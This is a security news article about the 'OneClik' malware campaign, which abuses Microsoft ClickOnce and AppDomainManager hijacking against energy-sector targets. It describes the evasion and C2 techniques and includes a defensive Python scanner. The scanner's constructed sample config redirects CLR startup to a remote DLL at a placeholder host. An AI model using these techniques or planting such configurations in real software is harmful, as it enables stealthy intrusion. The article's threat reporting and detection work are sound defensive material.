A recent report by the Trellix Advanced Research Center has exposed a highly advanced malware campaign, dubbed “OneClik,” which leverages Microsoft ClickOnce technology to execute malicious payloads on targeted systems.
The attackers specifically focus on the energy, oil, and gas sector, using phishing emails to deliver seemingly legitimate applications that, once launched, unleash sophisticated backdoors and command-and-control (C2) capabilities.
The campaign’s tactics, techniques, and procedures (TTPs) bear hallmarks of Chinese-affiliated advanced persistent threat (APT) groups, though attribution remains cautious.
Technical Exploitation: From ClickOnce to Backdoor Execution
Microsoft ClickOnce is a trusted .NET deployment technology that enables self-updating applications from remote sources.
However, threat actors have weaponized this feature, launching malicious code under the trusted “dfsvc.exe” host process.
This allows attackers to bypass traditional security controls, executing their payloads with the user's privileges and without triggering User Account Control (UAC) prompts, which makes detection significantly more challenging.
In the OneClik campaign, victims are lured via phishing emails to a fake “hardware analysis” website. Clicking the link downloads a ClickOnce manifest (.application file), masquerading as a legitimate tool.

Once executed, the manifest triggers the ClickOnce loader, which then injects malicious code via tampered .NET configuration files.
The loader employs AppDomainManager hijacking (T1574.014), modifying the .exe.config file to load a remote attacker-controlled DLL at Common Language Runtime (CLR) startup.
This technique ensures that the legitimate application (e.g., ZSATray.exe, umt.exe, or ied.exe) loads malicious code before its typical dependencies.
The malware’s modular loader, dubbed “OneClikNet,” is capable of fetching its payload through multiple channels: downloading from a C2 server, reading from a local file, or using an embedded payload.
The loader also generates machine-specific victim identifiers, suggesting targeted operations.
Payloads are encrypted with AES-128-CBC, using brute-forced initialization vectors to avoid static detection signatures.
Once decrypted, the loader executes shellcode in memory, leveraging internal .NET mechanisms to avoid traditional API calls and further evade detection.
Advanced Evasion and Cloud-Based C2 Infrastructure
The campaign’s sophistication is evident in its continuous evolution across three main variants (v1a, BPI-MDM, and v1d).
Each variant introduces new anti-analysis measures, such as anti-debugging loops, sandbox detection, and environment checks (e.g., domain/Azure AD join status, minimum RAM requirements).
The final payload, a Golang-based backdoor called “RunnerBeacon,” communicates with the attacker’s infrastructure, which is hidden behind legitimate AWS services—CloudFront, API Gateway, and Lambda—blending malicious traffic with normal cloud usage.
RunnerBeacon encrypts all C2 traffic with RC4 and serializes data using MessagePack, supporting multiple communication channels (HTTP, WebSockets, TCP, and SMB named pipes).
The backdoor’s modular protocol allows for a wide range of commands, including shell execution, file operations, network proxying, and process injection.
Defender Recommendations
Defenders are advised to monitor ClickOnce deployment activities closely, scrutinize .NET configuration files for suspicious modifications, and implement behavioral detection for unusual process activity under dfsvc.exe.
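One way to act on the recommendation to scrutinize .NET configuration files is a small scanner for the two CLR settings that AppDomainManager hijacking (T1574.014) relies on, plus any codeBase entry that would pull an assembly from a remote location. This is an added example, not code from Trellix or the report; both configuration samples are constructed, with placeholder assembly names and the example.invalid host.

```python
import xml.etree.ElementTree as ET

# <runtime> settings that redirect CLR startup to a custom AppDomainManager (T1574.014).
APPDOMAIN_MANAGER_TAGS = ("appDomainManagerAssembly", "appDomainManagerType")
# codeBase hrefs that would make the runtime fetch an assembly from a remote location.
REMOTE_PREFIXES = ("http://", "https://", "\\\\")

def scan_dotnet_config(config_xml: str) -> list[dict]:
    """Return every AppDomainManager redirection or remote codeBase found in a .exe.config.

    Tags are compared with their XML namespace stripped, because assemblyBinding
    lives in the urn:schemas-microsoft-com:asm.v1 namespace.
    """
    findings = []
    for elem in ET.fromstring(config_xml).iter():
        tag = elem.tag.rsplit("}", 1)[-1]
        if tag in APPDOMAIN_MANAGER_TAGS:
            findings.append({"indicator": tag, "value": elem.get("value", "")})
        elif tag == "codeBase":
            href = elem.get("href", "")
            if href.lower().startswith(REMOTE_PREFIXES):
                findings.append({"indicator": "remoteCodeBase", "value": href})
    return findings

# Constructed sample: an ordinary config that only pins the runtime version.
BENIGN_CONFIG = """<configuration>
  <startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" /></startup>
</configuration>"""

# Constructed sample (placeholder names): redirects CLR startup to a custom
# AppDomainManager and points its assembly at a remote codeBase.
SUSPICIOUS_CONFIG = """<configuration>
  <runtime>
    <appDomainManagerAssembly value="PlaceholderLoader, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
    <appDomainManagerType value="PlaceholderLoader.Manager" />
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="PlaceholderLoader" />
        <codeBase version="1.0.0.0" href="https://example.invalid/PlaceholderLoader.dll" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>"""

if __name__ == "__main__":
    for label, cfg in (("benign", BENIGN_CONFIG), ("suspicious", SUSPICIOUS_CONFIG)):
        for hit in scan_dotnet_config(cfg):
            print(f"{label}: {hit['indicator']} = {hit['value']}")
```

In practice the function would be run over every *.exe.config next to a ClickOnce-deployed executable, and any hit correlated with the dfsvc.exe process activity mentioned above.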
Network monitoring for anomalous traffic to AWS services (especially CloudFront, API Gateway, and Lambda) can help identify potential C2 communication.
By understanding and mapping these TTPs, organizations can better protect themselves against this and similar advanced threats.